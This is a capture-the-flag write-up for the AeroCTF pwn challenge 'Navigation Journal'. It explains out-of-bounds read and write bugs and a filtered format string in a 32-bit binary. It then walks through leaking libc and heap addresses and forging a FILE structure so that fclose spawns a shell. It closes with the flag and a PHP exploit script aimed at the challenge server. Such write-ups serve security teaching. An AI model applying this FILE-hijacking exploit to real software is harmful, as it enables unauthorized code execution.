Navigation Journal is a pwn task.
An archive containing a binary, a libc and its corresponding loader (ld.so
The binary provides the user with two journals : a main journal and a sub journal. The user can open, read and close the main journal. They can open, read, write and close the sub journal. They can also change their username.
This binary is a 32-bits binary.
The program keeps opens and closes files. To keep track of its internal state,
it uses a global variable nav_jr
. Its type matches the following structure :
char subBuffer[0x400];
char mainBuffer[0x200];
FILE *mainJournal;
FILE *subJournal;
opens /tmp/journal.txt
nav_jr->mainJournal = fopen("/tmp/journal.txt", "r");
reads the main journal into the main buffer. It prints its
if(nav_jr->mainJournal != NULL) {
fread(nav_jr->mainBuffer, 1, 0x200, nav_jr->mainJournal);
write(STDOUT_FILENO, nav_jr->mainBuffer, 0x200);
closes the main journal
if(nav_jr->mainJournal != NULL)
These functions do not provide a great interest from an attacker's standpoint as nothing is controlled by the user.
creates a file in /tmp/
. The function first generates a
random name and asks the user if they agree with this name. If the user refuses,
they can provide their own name. The name cannot contain any of the following
characters: ./tkasnfhglxd
strcpy(path, "/tmp/");
strcat(path, generate_random_name());
if(askUser()) {
read(STDIN_FILENO, buffer, 6);
replace(buffer, "./tkasnfhglxd", ' ');
strcpy(path, "/tmp/");
strcat(path, buffer);
printf("{+} New file name: ");
flushes the sub journal buffer and closes it.
if(nav_jr->subJournal != NULL) {
fwrite(nav_jr->subBuffer, 0x400, nav_jr->subJournal);
displays 0x604 bytes of the sub journal buffer to the user.
write(STDOUT_FILENO, nav_jr->subBuffer, 0x604);
reads 0x604 bytes to the sub journal buffer from the user.
read(STDIN_FILENO, nav_jr->subBuffer, 0x604);
This program contains 3 vulnerabilities: two out-of-bounds (read and write) in
the read_sub_journal
and write_sub_journal
functions, and a format string in
the open_sub_journal
The OOB read allows an attacker to leak the address of nav_jr->mainJournal
This address points to the program's heap.
The OOB write allows an attacker to overwrite the address of
and call the FILE
functions with a crafter
The format string is not as powerful as a true format string as some characters,
in particular n
and s
are blacklisted. It cannot be used to read or write
arbitrary memory. On top of that, its size is very limited.
Capital letters are not replaced, this means the vulnerability can be used to
leak variables on the stack with %X
. An address of the libc can be retrieved
with %17$X
The binary can be exploited by following these steps:
structure on subBuffer
pointer with a pointer to the fake structureClosing the main journal will call fclose(fp)
. By setting the vtable to call
instead of fclose
, it is possible to have the program call
This can be done by having the first few bytes of the fake FILE
structure to
23 80 AD FB 0A #\x80\xAD\xFB\n
73 68 00 sh\x00
Flag: Aero{e9b132dd85f0c1be26c01ab22e2e7d545dff7d52dbda745fe3dd5796bea14153}
function menu(Tube $t)
$t->expectLine("------ Navigation Journal ------");
$t->expectLine("1. Open main journal");
$t->expectLine("2. Read main journal");
$t->expectLine("3. Close main journal");
$t->expectLine("4. Create sub journal");
$t->expectLine("5. Write sub journal");
$t->expectLine("6. Read sub journal");
$t->expectLine("7. Close sub journal");
$t->expectLine("8. Change username");
$t->expectLine("9. Exit");
$t->expect("> ");
function openSub(Tube $t, $name = null)
$t->expect("{+} Creating journal with name </tmp/");
$rng = $t->read(16);
$leak = null;
$t->expect("{?} Do you agree with this name?[Y\N]: ");
if($name) {
$t->expect("{?} Enter your name: ");
$t->expect("{+} New file name: /tmp/");
$leak = $t->readLine();
if(6 === strlen($name))
return [$rng, $leak];
function closeSub($t)
function write(Tube $t, $data)
$t->expect("{?} Enter data: ");
$t = new Socket("tasks.aeroctf.com", 33013);
$t->expect("Enter your name: ");
$t->expect("Hello, ");
list($rng, $leak) = openSub($t, "%17\$X\n");
$libc = hexdec($leak) - 0xF7EF3B23 + 0xf7e1e000;
printf("[+] libc: %08X\n", $libc);
list($rng, $leak) = openSub($t, "%13\$X\n");
$heap = hexdec($leak) - 0x1830;
printf("[+] heap: %08X\n", $heap);
$struct = pack("V*",
0xFBAD0000 | 0x8000 | ord("#"), // _flags
unpack("V", "\nsh\0")[1], $libc + 0x0003ada0,
0x00000000, //_IO_read_{ptr,end,base}
0x00000000, 0x00000000, 0x00000000, //_IO_write_{base,ptr,end}
0x00000000, 0x00000000, //_IO_buf_{base,end}
0x00000000, 0x00000000, 0x00000000, //_IO_save_base,backup_base,save_end
0x00000000, // _IO_marker
0x00000000, // _chain
0x00000000, // fileno
0x00000000, // flags2
0xFFFFFFFF, // _old_offset
0x00000000, // cur_column + vtable_offset + shortbuf
0xdeadbeef, // lock
0xFFFFFFFF, 0xFFFFFFFF, // offset quad
0x00000000, 0x00000000, 0x00000000, 0x00000000, // pad
0x00000000, // pad5
0x00000000, // mode
0x00000000, 0x00000000, 0x00000000, 0x00000000, // unused
) . pack("V", 0xcafebabe)
. pack("V", 0xcafebabe)
. pack("V", 0xcafebabe)
. pack("V", 0xcafebabe)
. pack("V", 0xcafebabe)
. pack("V", 0xcafebabe)
. pack("V", $heap + 0x08)
$payload = str_pad($struct, 0x600) . pack("V", $heap + 0x08);
write($t, $payload);
printf("[+] Pipe\n");